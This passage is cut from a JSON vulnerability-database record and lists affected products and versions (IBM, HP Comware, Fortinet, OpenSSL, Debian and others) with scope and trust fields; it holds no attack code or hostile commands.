{ "model": "6127xlg r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "a6600 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r1810p03", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58005)" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.1" }, { "model": "moonshot r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.31" }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.34" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3387" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.1" }, { "model": "security network controller 1.0.3352m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.14" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.13" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4.0650" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "flex system fc3171 8gb san switch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "project openssl 1.0.1n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.0" }, { "model": "project openssl 1.0.1o", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "ei (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "55005)" }, { "model": "5510hi (comware r1120", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.16" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.18" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.17" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10.1" }, { "model": "(comware r2150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "79007)" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "msr1000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.3" }, { "model": "vsr (comware e0322p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "manageability sdk", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.9.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.7" }, { "model": "wx5004-ei (comware r2507p44", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.15" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.13" }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.404" }, { "model": "4800g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "(comware r3113p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "51307)" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "smb1920 (comware r1112", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.1" }, { "model": "10.1-release-p19", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.35" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.010" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "smartcloud entry appliance fixpac", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "u200s and cs (comware f5123p33", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.23" }, { "model": "(comware r2432p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "57007)" }, { "model": "fortivoiceos", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "msr4000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0" }, { "model": "hp6000 (comware r2507p44", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "(comware r1118p13", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "58305)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.4" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.11" }, { "model": "netezza diagnostics tools", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3.1.1" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rse ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "intelligent management center", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "0" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.3" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.2" }, { "model": "rpe ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "66005" }, { "model": "(comware r5213p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3100v25)" }, { "model": "storwize unified", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.4" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.8" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.17" }, { "model": "vcx", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "9.8.19" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.6" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.0.5" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "smartcloud entry appliance fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.21" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.3" }, { "model": "qradar incident forensics", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "flex system fc3171 8gb san switch", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.8.01.00" }, { "model": "ctpview", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "7.3" }, { "model": "security identity governance and intelligence", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "(comware r7377", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125007)" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.10" }, { "model": "security network controller 1.0.3394m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "security network controller 1.0.3381m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "comware", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "50" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.37" }, { "model": "imc plat e0403p04", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.0.3.16.00" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.2.3" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.4" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.211" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "project openssl 1.0.1m", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.4" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.5" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.6" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.16" }, { "model": "10.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "forticlient", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.3.633" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "initiate master data service provider hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.3" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.0" }, { "model": "(comware r1517p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v19105)" }, { "model": "hp830 (comware r3507p51", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.11" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "505)" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "hsr6800 (comware r3303p28", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.13" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.2" }, { "model": "forticlient ios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.6" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.41" }, { "model": "forticlient android", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.6" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.17" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.7" }, { "model": "u200a and m (comware f5123p33", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "project openssl 1.0.2d", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "initiate master data service patient hub", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.1" }, { "model": "ctpview 7.1r3", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.2" }, { "model": "hsr6602 ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.9" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.1" }, { "model": "ctpview 7.1r2", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3381" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.6" }, { "model": "(comware r1210p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "105005)" }, { "model": "project openssl 1.0.0p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.1" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.12" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1.3" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.0" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.13" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "fortianalyzer", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "nj5000 r1107", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "hsr6600 (comware r7103p09", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.8" }, { "model": "power hmc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1.0.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.1.3" }, { "model": "hsr6800 ru r3303p28.ru", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5" }, { "model": "project openssl 1.0.0n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.8" }, { "model": "tivoli netcool reporter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "(comware r1829p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "125005)" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "project openssl 1.0.0r", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "qlogic virtual fabric extension module for ibm bladecenter", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3376" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.62" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.12" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.2" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.2" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "msr20-1x (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "msr3000 (comware r0306p12", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.53" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9500e (comware r1829p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "fortidb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3" }, { "model": "5130hi (comware r1120", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7)" }, { "model": "5500si (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "project openssl 1.0.1b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.25" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.33" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.2.0" }, { "model": "storwize unified", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.5.2.2" }, { "model": "smartcloud provisioning", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.12" }, { "model": "smartcloud entry appliance fixpac", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "security access manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "3.2" }, { "model": "qradar siem patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.43" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "infosphere master data management standard/advanced edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "qradar siem", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.3" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "93x5)" }, { "model": "rational clearquest", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.18" }, { "model": "websphere mq advanced message security", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "-8.0.0.0" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "10.1-release-p23", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.1.4" }, { "model": "10.1-release-p16", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.11" }, { "model": "fortiap", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0.8" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.5" }, { "model": "ctpview 7.1r1", "scope": null, "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "(comware r3113p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "19507)" }, { "model": "fortiadc", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.12" }, { "model": "forticache", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2" }, { "model": "(comware r6710p02", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "75005)" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.2.5" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.9" }, { "model": "fortiwan", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "fortios", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2.4" }, { "model": "security network controller 1.0.3376m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "oncommand unified manager for clustered data ontap", "scope": "eq", "trust": 0.3, "vendor": "netapp", "version": "6.0" }, { "model": "(comware r2111p01", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "3600v25)" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.9" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "security network controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.3379" }, { "model": "fortimanager", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.2" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "(comware r1150", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "129007)" }, { "model": "msr (comware r2516", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "305)" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.0" }, { "model": "10.1-release-p25", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "fortirecorder", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "1.4.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.3.0" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "mobile foundation enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.0.1" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.14" }, { "model": "qradar incident forensics patch", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.41" }, { "model": "fortiddos", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "0" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.4.8" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0.2" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.10" }, { "model": "sonas", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.1.0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "icewall mcrp", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0" }, { "model": "fortisandbox", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "2.0.3" }, { "model": "secblade fw (comware r3181p07", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "4210g (comware r2221p22", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "5)" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.32" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "rational clearquest", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.7" }, { "model": "icewall sso certd", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "10.0" }, { "model": "6125g/xg blade switch r2112p05", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.0.1" }, { "model": "fortiweb", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "5.3.2" }, { "model": "rational requisitepro", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.18" }, { "model": "project 